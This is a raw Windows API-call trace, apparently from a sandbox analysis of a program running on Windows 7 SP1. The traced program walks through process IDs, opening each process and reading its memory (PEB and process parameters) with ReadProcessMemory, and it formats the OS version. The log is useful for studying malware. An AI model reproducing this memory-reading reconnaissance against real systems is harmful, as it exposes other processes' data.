[0413.223] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.224] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.224] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x261ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.224] malloc (_Size=0x60) returned 0x2c0790
[0413.224] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x262738, lpBuffer=0x2c0790, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0413.224] free (_Block=0x2c0790)
[0413.225] CloseHandle (hObject=0x24c) returned 1
[0413.229] _ui64tow (_Value=0x6e4, _Buffer="2088", _Radix=10) returned="1764"
[0413.234] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1764") returned 4
[0413.235] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.235] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.255] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6e4) returned 0x24c
[0413.255] GetLastError () returned 0x0
[0413.255] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.255] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.256] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.256] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3828f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.256] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3826e4, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.257] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.258] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.258] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.258] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x381ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.259] malloc (_Size=0x62) returned 0x2c0790
[0413.259] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x38273e, lpBuffer=0x2c0790, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0413.259] free (_Block=0x2c0790)
[0413.260] CloseHandle (hObject=0x24c) returned 1
[0413.303] _ui64tow (_Value=0x71c, _Buffer="1764", _Radix=10) returned="1820"
[0413.308] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1820") returned 4
[0413.309] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x239, dwBuildNumber=0x0, dwPlatformId=0x128260, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.309] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.336] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x24c
[0413.336] GetLastError () returned 0x0
[0413.336] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.336] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.336] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.337] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x482920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.337] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4826f2, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.338] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.339] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.339] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.339] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x481ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.340] malloc (_Size=0x72) returned 0x2c1680
[0413.340] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x48275c, lpBuffer=0x2c1680, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.340] free (_Block=0x2c1680)
[0413.341] CloseHandle (hObject=0x24c) returned 1
[0413.341] _ui64tow (_Value=0x738, _Buffer="1820", _Radix=10) returned="1848"
[0413.346] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1848") returned 4
[0413.348] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.348] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x24c
[0413.370] GetLastError () returned 0x0
[0413.371] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.371] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.371] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.371] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x512910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.371] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5126ee, lpBuffer=0x12dd100, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.372] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.373] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.373] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.374] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x511ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.374] malloc (_Size=0x6a) returned 0x2c1680
[0413.374] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x512750, lpBuffer=0x2c1680, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.374] free (_Block=0x2c1680)
[0413.375] CloseHandle (hObject=0x24c) returned 1
[0413.376] _ui64tow (_Value=0x830, _Buffer="1848", _Radix=10) returned="2096"
[0413.380] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2096") returned 4
[0413.385] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.385] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.407] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x24c
[0413.407] GetLastError () returned 0x0
[0413.407] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.407] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.407] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.408] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x72950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.408] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x726fa, lpBuffer=0x12dd100, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.411] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.412] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.413] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.413] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x71ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.413] malloc (_Size=0x7e) returned 0x2e3b90
[0413.413] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x72770, lpBuffer=0x2e3b90, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3b90*, lpNumberOfBytesRead=0x0) returned 1
[0413.413] free (_Block=0x2e3b90)
[0413.414] CloseHandle (hObject=0x24c) returned 1
[0413.415] _ui64tow (_Value=0x868, _Buffer="2096", _Radix=10) returned="2152"
[0413.419] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2152") returned 4
[0413.421] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.421] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.447] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x868) returned 0x24c
[0413.448] GetLastError () returned 0x0
[0413.448] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.448] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.448] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.448] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f2910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.448] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f26e0, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.449] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.450] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.450] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.451] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.451] malloc (_Size=0x72) returned 0x2c1680
[0413.451] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f274a, lpBuffer=0x2c1680, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.451] free (_Block=0x2c1680)
[0413.452] CloseHandle (hObject=0x24c) returned 1
[0413.453] _ui64tow (_Value=0x878, _Buffer="2152", _Radix=10) returned="2168"
[0413.457] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2168") returned 4
[0413.458] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.458] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x878) returned 0x24c
[0413.488] GetLastError () returned 0x0
[0413.488] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.488] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.488] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.489] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x482960, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.489] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4826fa, lpBuffer=0x12dd100, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.490] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.491] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.491] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.491] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x481ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.492] malloc (_Size=0x84) returned 0x2e3a70
[0413.492] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x482776, lpBuffer=0x2e3a70, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3a70*, lpNumberOfBytesRead=0x0) returned 1
[0413.492] free (_Block=0x2e3a70)
[0413.493] CloseHandle (hObject=0x24c) returned 1
[0413.494] _ui64tow (_Value=0x884, _Buffer="2168", _Radix=10) returned="2180"
[0413.497] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2180") returned 4
[0413.499] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.499] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.520] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x884) returned 0x24c
[0413.521] GetLastError () returned 0x0
[0413.521] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.521] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.521] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.521] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x442930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.521] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4426f6, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.522] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.523] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.524] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.524] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x441ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.524] malloc (_Size=0x72) returned 0x2c1680
[0413.524] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x442760, lpBuffer=0x2c1680, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.524] free (_Block=0x2c1680)
[0413.525] CloseHandle (hObject=0x24c) returned 1
[0413.526] _ui64tow (_Value=0x554, _Buffer="2180", _Radix=10) returned="1364"
[0413.530] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1364") returned 4
[0413.531] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.531] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.554] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x554) returned 0x24c
[0413.554] GetLastError () returned 0x0
[0413.554] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.554] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.555] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.555] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b28e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.555] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b26e8, lpBuffer=0x12dd100, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.556] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.557] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
